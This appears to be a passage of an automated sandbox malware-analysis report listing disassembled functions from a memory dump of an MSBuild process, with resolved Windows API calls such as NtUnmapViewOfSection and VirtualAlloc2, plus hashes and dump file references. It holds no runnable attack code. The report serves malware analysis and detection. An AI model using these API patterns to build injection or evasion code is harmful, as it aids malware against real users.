                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8aa2029eb177eb7ea3f009b52d30d320077198cb557459623e98b38d796eeee3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AE075B47492859BEB106F6A99087567AF9F707389F30445EAD06D6740D770D100CB59
                                                                                                                                                                                                                      Function 6C8C0170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C897308), ref: 6C8C0178
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C8C0197
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C897308), ref: 6C8C01AE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-3354427110
                                                                                                                                                                                                                      • Opcode ID: b01c7f05f9481ffe701b06f51f89c7324b586510ded31d2702b416337396eb89
                                                                                                                                                                                                                      • Instruction ID: ae6deadfa4b75b8089d6c27f1fbf7db9d5d304550bf82491095198867b6cc2fd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b01c7f05f9481ffe701b06f51f89c7324b586510ded31d2702b416337396eb89
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DE09AB478D2059BEF509F65CA18B417BFDF706289F34449FED8681780D774C140DA95
                                                                                                                                                                                                                      Function 6C8EC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6C8EC0E9), ref: 6C8EC418
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C8EC437
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8EC0E9), ref: 6C8EC44C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 145871493-2623246514
                                                                                                                                                                                                                      • Opcode ID: 99eec0494fcabe23c8a063daeecbdac6aa0291b054a10a0a842fe64e9fae28d7
                                                                                                                                                                                                                      • Instruction ID: 1d77b27d520e150236b7dab8b04406b71f3e4df5346c7ef7a362f38a1b2962ae
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99eec0494fcabe23c8a063daeecbdac6aa0291b054a10a0a842fe64e9fae28d7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75E092707093019BDB10AB718A18B527EF8B70B64CF20459EAE0691641EBB0D1418A98
                                                                                                                                                                                                                      Function 6C8E75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6C8E748B,?), ref: 6C8E75B8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C8E75D7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8E748B,?), ref: 6C8E75EC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 145871493-3641475894
                                                                                                                                                                                                                      • Opcode ID: f783977ef7cbcca0c65869922978744aea347d725e59a333dd8ab218a9a85fb5
                                                                                                                                                                                                                      • Instruction ID: 7900fb4f2eb8470da46cccff6d3cf8f1aa5ececd4176fcd2557b0c55ae1e8d15
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f783977ef7cbcca0c65869922978744aea347d725e59a333dd8ab218a9a85fb5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90E09A7170C301ABDB015FA1C9487017AF8E747A5AF30542DE905D1641DBB08345DF56
                                                                                                                                                                                                                      Function 6C8E7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6C8E7592), ref: 6C8E7608
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C8E7627
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8E7592), ref: 6C8E763C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 145871493-1050664331
                                                                                                                                                                                                                      • Opcode ID: 0456013421cc8038267b65a5dac2e5df073b9bdab41a35d71f7dff4a6cf42932
                                                                                                                                                                                                                      • Instruction ID: 33525b784315cf60dbdf023df07acce0eacd8cbd0b40e32072e3ae5e904e2c12
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0456013421cc8038267b65a5dac2e5df073b9bdab41a35d71f7dff4a6cf42932
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FE0B6B0709301ABDF416FA6C90870A7AB8F75BB9EF30451DEA05D1751E7B0C6049F5A
                                                                                                                                                                                                                      Function 6C8EC1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C8EC1DE,?,00000000,?,00000000,?,6C89779F), ref: 6C8EC1F8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C8EC217
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8EC1DE,?,00000000,?,00000000,?,6C89779F), ref: 6C8EC22C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: WinVerifyTrust$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-2991032369
                                                                                                                                                                                                                      • Opcode ID: 2c411b53ecd8206d7239c0b4d4ae89661221eb1994dd8a608bdf2cec40907892
                                                                                                                                                                                                                      • Instruction ID: c65fa5b3aed5b8d070f134c1ea20c9cd7cd7d911ce641ed430a9daac4a1189e9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c411b53ecd8206d7239c0b4d4ae89661221eb1994dd8a608bdf2cec40907892
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BE092747093419BDB10BB668A08B467FF8BB17248F3009ADAD0691A42E7B081008B98
                                                                                                                                                                                                                      Function 6C8EC290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C8977C5), ref: 6C8EC298
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6C8EC2B7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8977C5), ref: 6C8EC2CC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • CryptCATAdminCalcHashFromFileHandle, xrefs: 6C8EC2B1
                                                                                                                                                                                                                      • wintrust.dll, xrefs: 6C8EC293
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-1423897460
                                                                                                                                                                                                                      • Opcode ID: 11eb418c849582f4089f5dda073222205125f195f7f036f5eab72b1f289b4c9f
                                                                                                                                                                                                                      • Instruction ID: ac6009fa02773e98762f9cab83c2e419b6529709475816a84f03693e2c8c4ad6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11eb418c849582f4089f5dda073222205125f195f7f036f5eab72b1f289b4c9f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54E092747492019FEF00BB6A89087427EF8FB07648F7404ADED0691A51E7B1C100CA98
                                                                                                                                                                                                                      Function 6C8EBAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(kernelbase.dll,?,6C8905BC), ref: 6C8EBAB8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6C8EBAD7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8905BC), ref: 6C8EBAEC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: VirtualAlloc2$kernelbase.dll
                                                                                                                                                                                                                      • API String ID: 145871493-1188699709
                                                                                                                                                                                                                      • Opcode ID: 7ce955475029bd88cd628f063b5402883155b064b0726c963492bfbb13656c3a
                                                                                                                                                                                                                      • Instruction ID: 64c8f3171f00b2bb6935509973df32ed8c84ef82e4fa65532f2cf2d1124f2463
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ce955475029bd88cd628f063b5402883155b064b0726c963492bfbb13656c3a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EDE0B67030D3829BDF009F62DA18B967BF8F707A4CF34446EAD06D1640EBB4C2448B58
                                                                                                                                                                                                                      Function 6C8EBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?,?,6C8EBE49), ref: 6C8EBEC4
                                                                                                                                                                                                                      • RtlCaptureStackBackTrace.NTDLL ref: 6C8EBEDE
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C8EBE49), ref: 6C8EBF38
                                                                                                                                                                                                                      • RtlReAllocateHeap.NTDLL ref: 6C8EBF83
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(6C8EBE49,00000000), ref: 6C8EBFA6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2764315370-0
                                                                                                                                                                                                                      • Opcode ID: a81b26ea88a21f1bef27e4458903223812aa582510b0e26c101b14d1e99dfdf1
                                                                                                                                                                                                                      • Instruction ID: f9d0bcc52d3ab2f0e25090c392b5eca1a4cf3681a69278da190e5f5de3cc74eb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a81b26ea88a21f1bef27e4458903223812aa582510b0e26c101b14d1e99dfdf1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70519271A003058FE724CF68CE80BAAB7A6FF89314F294A39D515A7B55D730F9068F84
                                                                                                                                                                                                                      Function 6C8D8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C8CB58D,?,?,?,?,?,?,?,6C8FD734,?,?,?,6C8FD734), ref: 6C8D8E6E
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C8CB58D,?,?,?,?,?,?,?,6C8FD734,?,?,?,6C8FD734), ref: 6C8D8EBF
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C8CB58D,?,?,?,?,?,?,?,6C8FD734,?,?,?), ref: 6C8D8F24
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C8CB58D,?,?,?,?,?,?,?,6C8FD734,?,?,?,6C8FD734), ref: 6C8D8F46
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C8CB58D,?,?,?,?,?,?,?,6C8FD734,?,?,?), ref: 6C8D8F7A
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C8CB58D,?,?,?,?,?,?,?,6C8FD734,?,?,?), ref: 6C8D8F8F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                                      • Opcode ID: 7ebdd09e54f6feddddf7b1cfc665a65615b5b10c0fa1a3c06d73075cf501e277
                                                                                                                                                                                                                      • Instruction ID: 6f30a3a6b314063e7beb039af1390c8a4808555ab957e722b2b96d4b89b7d2d2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ebdd09e54f6feddddf7b1cfc665a65615b5b10c0fa1a3c06d73075cf501e277
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6651A7B1A016168FEB24CF58D98076E73B6FF45314F26092AD516AB740E731F905CBD2
                                                                                                                                                                                                                      Function 6C8960E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C895FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8960F4
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C895FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C896180
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C895FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C896211
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C895FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C896229
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C895FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C89625E
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C895FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C896271
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                                      • Opcode ID: 39513d539db1383e69ad8074649cd06e8defb6a837f8ebbfa97419d3f4572223
                                                                                                                                                                                                                      • Instruction ID: fc9618036afeaceabf2184fc2471efdcc0a76476004910708bec6a0c4d5cb817
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39513d539db1383e69ad8074649cd06e8defb6a837f8ebbfa97419d3f4572223
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC5169B1A042068FEB64CFACDA807AEB7B5AF45308F21083DD516D7751E731A954CBA2
                                                                                                                                                                                                                      Function 6C8D27E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C8D2620,?,?,?,6C8C60AA,6C8C5FCB,6C8C79A3), ref: 6C8D284D
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C8D2620,?,?,?,6C8C60AA,6C8C5FCB,6C8C79A3), ref: 6C8D289A
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6C8D2620,?,?,?,6C8C60AA,6C8C5FCB,6C8C79A3), ref: 6C8D28F1
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C8D2620,?,?,?,6C8C60AA,6C8C5FCB,6C8C79A3), ref: 6C8D2910
                                                                                                                                                                                                                      • free.MOZGLUE(00000001,?,?,6C8D2620,?,?,?,6C8C60AA,6C8C5FCB,6C8C79A3), ref: 6C8D293C
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C8D2620,?,?,?,6C8C60AA,6C8C5FCB,6C8C79A3), ref: 6C8D294E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                                      • Opcode ID: cbb8cce1527c5902139c7373d38ee0b479a30c0a011ef6e0d1b4e6ee03ad0718
                                                                                                                                                                                                                      • Instruction ID: bdd5ec5a480ea04d2e4a76fcd7abbd7e87cc5f0c6e2ff781a97eff683ff1edd9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cbb8cce1527c5902139c7373d38ee0b479a30c0a011ef6e0d1b4e6ee03ad0718
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB41F0B1B002068FEB20CF68D984B6A73F6AF45308F260839D556EB740E735F905CB62
                                                                                                                                                                                                                      Function 6C88CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C88CFF6
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C88D026
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C88D06C
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C88D139
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                                                                                                                                                      • String ID: MOZ_CRASH()
                                                                                                                                                                                                                      • API String ID: 1090480015-2608361144
                                                                                                                                                                                                                      • Opcode ID: bb45e2d9819edb96cacd57cb61faf14999ee58101018821420d21facebe5b1e7
                                                                                                                                                                                                                      • Instruction ID: 7fc55126f08047b184440ad604f3758769f44722991b01774e95edf62b75479e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb45e2d9819edb96cacd57cb61faf14999ee58101018821420d21facebe5b1e7
